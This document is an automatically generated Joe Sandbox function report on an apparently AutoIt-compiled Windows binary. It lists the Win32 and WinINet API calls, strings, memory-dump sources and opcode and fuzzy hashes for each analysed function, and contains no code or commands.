                                                    APIs
                                                    • _wcslen.LIBCMT ref: 00466825
                                                    • InternetCrackUrlW.WININET(?,00000000,?), ref: 0046682F
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2182629858.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2182593651.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2182975447.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2182994985.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183017927.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183041814.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183041814.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183100937.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_juE8dtqPkx.jbxd
                                                    Similarity
                                                    • API ID: CrackInternet_wcslen
                                                    • String ID: |
                                                    • API String ID: 596671847-2343686810
                                                    • Opcode ID: 629f28f3e202f2691df4b53306abf03f6cbb1f7e83fd6186c7c4399916927608
                                                    • Instruction ID: c4ea99685e293915e64884ba1c360efc28696701351dc191072b09a6dd262d67
                                                    • Opcode Fuzzy Hash: 629f28f3e202f2691df4b53306abf03f6cbb1f7e83fd6186c7c4399916927608
                                                    • Instruction Fuzzy Hash: B1415076E10209ABDB00EFA5D881BEEB7B8FF58314F00002AE604A7291D7757916CBE5
                                                    APIs
                                                    • SendMessageW.USER32(?,00001132,00000000,?), ref: 00448446
                                                    • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 0044845F
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2182629858.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2182593651.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2182975447.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2182994985.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183017927.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183041814.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183041814.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183100937.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_juE8dtqPkx.jbxd
                                                    Similarity
                                                    • API ID: MessageSend
                                                    • String ID: '
                                                    • API String ID: 3850602802-1997036262
                                                    • Opcode ID: 21874a52306f08f821648492a7afc6200e27140433d35547b734f0a4523aa872
                                                    • Instruction ID: ddf1801fc3b7a37e921bcadc6f33ff454999d78e89978ed9e0859c1643e2593c
                                                    • Opcode Fuzzy Hash: 21874a52306f08f821648492a7afc6200e27140433d35547b734f0a4523aa872
                                                    • Instruction Fuzzy Hash: 46418E71A002099FDB04CF98D880AEEB7B5FF59300F14816EED04AB341DB756952CFA5
                                                    APIs
                                                    • _strlen.LIBCMT ref: 0040F858
                                                      • Part of subcall function 0040F880: _memmove.LIBCMT ref: 0040F8C9
                                                      • Part of subcall function 0040F880: _memmove.LIBCMT ref: 0040F8E3
                                                    • _sprintf.LIBCMT ref: 0040F9AE
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2182629858.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2182593651.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2182975447.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2182994985.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183017927.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183041814.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183041814.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183100937.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_juE8dtqPkx.jbxd
                                                    Similarity
                                                    • API ID: _memmove$_sprintf_strlen
                                                    • String ID: %02X
                                                    • API String ID: 1921645428-436463671
                                                    • Opcode ID: 767cb60b44986bc828a60f9d0ec6f7d4d26665b5612a1b4657e1e4afb2f114d1
                                                    • Instruction ID: e5a937a20bc973e7022889ba35624413ac66f4a4f80aeb0e2d5e31f1d02bff57
                                                    • Opcode Fuzzy Hash: 767cb60b44986bc828a60f9d0ec6f7d4d26665b5612a1b4657e1e4afb2f114d1
                                                    • Instruction Fuzzy Hash: 3E21287270021436D724B66E8C82FDAB39CAF55744F50007FF501A76C1EABCBA1983AD
                                                    APIs
                                                    • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 0045109A
                                                    • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 004510A8
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2182629858.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2182593651.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2182975447.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2182994985.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183017927.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183041814.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183041814.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183100937.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_juE8dtqPkx.jbxd
                                                    Similarity
                                                    • API ID: MessageSend
                                                    • String ID: Combobox
                                                    • API String ID: 3850602802-2096851135
                                                    • Opcode ID: 1b8a1482498e59a9e674e96fd5fabaeacd2ddbb1f8abcd0cc85bd7074ae773d5
                                                    • Instruction ID: 528d1b292af097fd122ed4be4541c74d7578eb88e117dd2fe935d7ad7cd5862b
                                                    • Opcode Fuzzy Hash: 1b8a1482498e59a9e674e96fd5fabaeacd2ddbb1f8abcd0cc85bd7074ae773d5
                                                    • Instruction Fuzzy Hash: 0A21A5716102096BEB10DE68DC85FDB3398EB59734F20431AFA24A72D1D3B9EC958768
                                                    APIs
                                                    • GetWindowTextLengthW.USER32(00000000), ref: 0045134A
                                                    • SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 0045135A
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2182629858.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2182593651.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2182975447.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2182994985.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183017927.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183041814.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183041814.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183100937.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_juE8dtqPkx.jbxd
                                                    Similarity
                                                    • API ID: LengthMessageSendTextWindow
                                                    • String ID: edit
                                                    • API String ID: 2978978980-2167791130
                                                    • Opcode ID: 458bf78cb5436efb918afa53a1743a3d6784074bbf07c1e17ba5dfdf6e920bd9
                                                    • Instruction ID: 5a0e340068a0ba28dc4d1c90c86d8b7761b767731f3a1bde811fb9e5560a91dc
                                                    • Opcode Fuzzy Hash: 458bf78cb5436efb918afa53a1743a3d6784074bbf07c1e17ba5dfdf6e920bd9
                                                    • Instruction Fuzzy Hash: BB2190761102056BEB108F68D894FEB33ADEB89339F10471AFD64D36E1C279DC458B68
                                                    APIs
                                                    • Sleep.KERNEL32(00000000), ref: 00476CB0
                                                    • GlobalMemoryStatusEx.KERNEL32 ref: 00476CC3
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2182629858.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2182593651.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2182975447.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2182994985.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183017927.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183041814.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183041814.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183100937.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_juE8dtqPkx.jbxd
                                                    Similarity
                                                    • API ID: GlobalMemorySleepStatus
                                                    • String ID: @
                                                    • API String ID: 2783356886-2766056989
                                                    • Opcode ID: e336f3d3cf010bdb765bf3cd25e4316ec625df5f035adc8ff92848a8f4c166eb
                                                    • Instruction ID: 7847cb5f82098321599ebf91c79b9dffd15eff11c36c925ad8cec94a5f412430
                                                    • Opcode Fuzzy Hash: e336f3d3cf010bdb765bf3cd25e4316ec625df5f035adc8ff92848a8f4c166eb
                                                    • Instruction Fuzzy Hash: 67217130508F0497C211BF6AAC4AB5E7BB8AF84B15F01886DF9C8A14D1DF745528C76F
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2182629858.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2182593651.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2182975447.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2182994985.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183017927.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183041814.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183041814.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183100937.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_juE8dtqPkx.jbxd
                                                    Similarity
                                                    • API ID: htonsinet_addr
                                                    • String ID: 255.255.255.255
                                                    • API String ID: 3832099526-2422070025
                                                    • Opcode ID: bffbf838f8b6926ef71edb3efae5563a838ccfa537518f0e0f8b175b1623bbd9
                                                    • Instruction ID: fb726eff09ff94cff080b531f734a3fd27281744828c6f3d0166551fa69e616e
                                                    • Opcode Fuzzy Hash: bffbf838f8b6926ef71edb3efae5563a838ccfa537518f0e0f8b175b1623bbd9
                                                    • Instruction Fuzzy Hash: 5211E732600304ABCF10DF69EC85FAA73A8EF45324F04455BF9049B392D635E4518B59
                                                    APIs
                                                    • InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 004425F8
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2182629858.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2182593651.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2182975447.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2182994985.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183017927.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183041814.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183041814.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183100937.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_juE8dtqPkx.jbxd
                                                    Similarity
                                                    • API ID: InternetOpen
                                                    • String ID: <local>
                                                    • API String ID: 2038078732-4266983199
                                                    • Opcode ID: 84bf365b150010c194f632228c20f1475d6fe654e04a12f862fc2198fde258ef
                                                    • Instruction ID: 93d8b03a482712ff69e4757b1f2b0d1c201104d099b6cd2898bf81ba059b6d15
                                                    • Opcode Fuzzy Hash: 84bf365b150010c194f632228c20f1475d6fe654e04a12f862fc2198fde258ef
                                                    • Instruction Fuzzy Hash: 9311C270680710BAF720CB548E62FBA77E8BB24B01F50844BF9429B6C0D6F4B944D7A9
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2182629858.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2182593651.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2182975447.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2182994985.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183017927.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183041814.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183041814.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183100937.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_juE8dtqPkx.jbxd
                                                    Similarity
                                                    • API ID: __fread_nolock_memmove
                                                    • String ID: EA06
                                                    • API String ID: 1988441806-3962188686
                                                    • Opcode ID: e45c56eab20c3bcfe4a359df8a9ba3729120cfe0f4e9d091ae644268b7df8977
                                                    • Instruction ID: b3ef0f2836274d974f80c1c05754fec17bf4118f678989acdc9742ef3c25ced0
                                                    • Opcode Fuzzy Hash: e45c56eab20c3bcfe4a359df8a9ba3729120cfe0f4e9d091ae644268b7df8977
                                                    • Instruction Fuzzy Hash: 7D014971904228ABCF18DB99DC56EFEBBF49F55301F00859EF59793281D578A708CBA0
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2182629858.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2182593651.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2182975447.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2182994985.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183017927.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183041814.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183041814.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183100937.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_juE8dtqPkx.jbxd
                                                    Similarity
                                                    • API ID: _memmove
                                                    • String ID: u,D
                                                    • API String ID: 4104443479-3858472334
                                                    • Opcode ID: a09dc1741948e98e7df597fac067bc9d4c41fa761799cf9fa5b02ea5b7d8fd51
                                                    • Instruction ID: 1e149f93898fe9afff494952afced4f728167d7c2cca3c00b97e401526751dc1
                                                    • Opcode Fuzzy Hash: a09dc1741948e98e7df597fac067bc9d4c41fa761799cf9fa5b02ea5b7d8fd51
                                                    • Instruction Fuzzy Hash: 4FF04C722007045AE3149E6ADC41FD7B7ECDBD8714F50442EF74997241E1B8A9858764
                                                    APIs
                                                    • _wcslen.LIBCMT ref: 00401B11
                                                      • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                    • _memmove.LIBCMT ref: 00401B57
                                                      • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411626
                                                      • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411640
                                                      • Part of subcall function 004115D7: __CxxThrowException@8.LIBCMT ref: 00411651
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2182629858.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2182593651.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2182975447.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2182994985.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183017927.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183041814.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183041814.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183100937.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_juE8dtqPkx.jbxd
                                                    Similarity
                                                    • API ID: std::exception::exception$Exception@8Throw_malloc_memmove_wcslen
                                                    • String ID: @EXITCODE
                                                    • API String ID: 2734553683-3436989551
                                                    • Opcode ID: 4236665bcc639584f04fcdb9ba1468009aa28956b7e53f741a3b1c0e70b2e800
                                                    • Instruction ID: 16ac7666fc6b8d0cd4c8082de1062d74cbdf630d8e5b0a9ec9a55ac2b86b5c72
                                                    • Opcode Fuzzy Hash: 4236665bcc639584f04fcdb9ba1468009aa28956b7e53f741a3b1c0e70b2e800
                                                    • Instruction Fuzzy Hash: D5F0CDF2B00641AFD720DB36DC02B6775E49B84308F04883EA24BC6795FA7DE4828B14
                                                    APIs
                                                    • SendMessageW.USER32(?,00001001,00000000,?), ref: 004560FE
                                                      • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                    • wsprintfW.USER32 ref: 0045612A
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2182629858.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2182593651.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2182975447.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2182994985.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183017927.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183041814.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183041814.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183100937.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_juE8dtqPkx.jbxd
                                                    Similarity
                                                    • API ID: MessageSend_mallocwsprintf
                                                    • String ID: %d/%02d/%02d
                                                    • API String ID: 1262938277-328681919
                                                    • Opcode ID: 176057d1547a49c229b5c6d08b1f9f4639a001779c71fa0498bff8c6852dc9fc
                                                    • Instruction ID: 953f6dd97ce98099cbba652085d0304866be84a46252058ffc4865c1a62d2123
                                                    • Opcode Fuzzy Hash: 176057d1547a49c229b5c6d08b1f9f4639a001779c71fa0498bff8c6852dc9fc
                                                    • Instruction Fuzzy Hash: 9DF0823274022866D7109BD9AD42FBEB3A8DB49762F00416BFE08E9180E6694854C3B9
                                                    APIs
                                                    • InternetCloseHandle.WININET(?), ref: 00442663
                                                    • InternetCloseHandle.WININET ref: 00442668
                                                      • Part of subcall function 004319AC: WaitForSingleObject.KERNEL32(aeB,?,?,00442688,aeB,00002710,?,?,00426561,?,?,0040F19D), ref: 004319BD
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2182629858.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2182593651.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2182975447.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2182994985.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183017927.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183041814.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183041814.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183100937.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_juE8dtqPkx.jbxd
                                                    Similarity
                                                    • API ID: CloseHandleInternet$ObjectSingleWait
                                                    • String ID: aeB
                                                    • API String ID: 857135153-906807131
                                                    • Opcode ID: c8224cb77d174d98af0e1b6511dcd9cd22ae279780c4dc09588970c0e039578a
                                                    • Instruction ID: 0fa74210230a71b56b5a48e3a0e63043fcf8dca502afcbd281d0c2380f7acdeb
                                                    • Opcode Fuzzy Hash: c8224cb77d174d98af0e1b6511dcd9cd22ae279780c4dc09588970c0e039578a
                                                    • Instruction Fuzzy Hash: 46E0E67650071467D310AF9ADC00B4BF7DC9F95724F11482FEA4497650C6B5B4408BA4
                                                    APIs
                                                    • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00441BFE
                                                    • PostMessageW.USER32(00000000), ref: 00441C05
                                                      • Part of subcall function 004331A2: Sleep.KERNEL32(00000000,?,00000000,?,?,?,?,?,?,?,?,?,004A8178), ref: 004331B9
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2182629858.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2182593651.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2182975447.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2182994985.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183017927.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183041814.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183041814.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183100937.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_juE8dtqPkx.jbxd
                                                    Similarity
                                                    • API ID: FindMessagePostSleepWindow
                                                    • String ID: Shell_TrayWnd
                                                    • API String ID: 529655941-2988720461
                                                    • Opcode ID: 45e518b183cc50fc9cae19d0f51122c68363ee0c98c893ad2541c3bd761d7025
                                                    • Instruction ID: aba4e04af0122a293c2d26b46e7c49f9db856b5fc79b6d6ac13cebee95b63d36
                                                    • Opcode Fuzzy Hash: 45e518b183cc50fc9cae19d0f51122c68363ee0c98c893ad2541c3bd761d7025
                                                    • Instruction Fuzzy Hash: EFD0A772BC13013BFA6077745D0FF8B66145B14711F000C3A7B42E61C1D4F8E4018758
                                                    APIs
                                                    • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00441C2A
                                                    • PostMessageW.USER32(00000000,00000111,00000197,00000000), ref: 00441C3D
                                                      • Part of subcall function 004331A2: Sleep.KERNEL32(00000000,?,00000000,?,?,?,?,?,?,?,?,?,004A8178), ref: 004331B9
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2182629858.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2182593651.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2182975447.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2182994985.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183017927.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183041814.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183041814.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183100937.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_juE8dtqPkx.jbxd
                                                    Similarity
                                                    • API ID: FindMessagePostSleepWindow
                                                    • String ID: Shell_TrayWnd
                                                    • API String ID: 529655941-2988720461
                                                    • Opcode ID: 2c92ce268d6dea70ed1d9c93ac972332f86dd545b3a9023bb22b3be85c6f7e29
                                                    • Instruction ID: e91d5bd0f3095d95abf168919443ed1e5ef8457e9bc9ee6dadeb2d3358a759b2
                                                    • Opcode Fuzzy Hash: 2c92ce268d6dea70ed1d9c93ac972332f86dd545b3a9023bb22b3be85c6f7e29
                                                    • Instruction Fuzzy Hash: 61D0A772B843017BFA6077745D0FF8B66145B14711F000C3A7B46A61C1D4F8D4018758
                                                    APIs
                                                    • MessageBoxW.USER32(00000000,Error allocating memory.,AutoIt,00000010), ref: 004370D1
                                                      • Part of subcall function 004118DA: _doexit.LIBCMT ref: 004118E6
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2182629858.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2182593651.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2182975447.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2182994985.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183017927.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183041814.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183041814.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183100937.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_juE8dtqPkx.jbxd
                                                    Similarity
                                                    • API ID: Message_doexit
                                                    • String ID: AutoIt$Error allocating memory.
                                                    • API String ID: 1993061046-4017498283
                                                    • Opcode ID: a805162a0f5c9c87f8277766c6d2ca4cce7c6123580b1b409358537ccd51af94
                                                    • Instruction ID: aa36ec6b1cc278624b5c670a1a0522bf80bf1016c56dd6686bcadf549e8ac499
                                                    • Opcode Fuzzy Hash: a805162a0f5c9c87f8277766c6d2ca4cce7c6123580b1b409358537ccd51af94
                                                    • Instruction Fuzzy Hash: F1B092323C030627E50437910D0BF9D26003B64F02F220C067324280D204C90090131D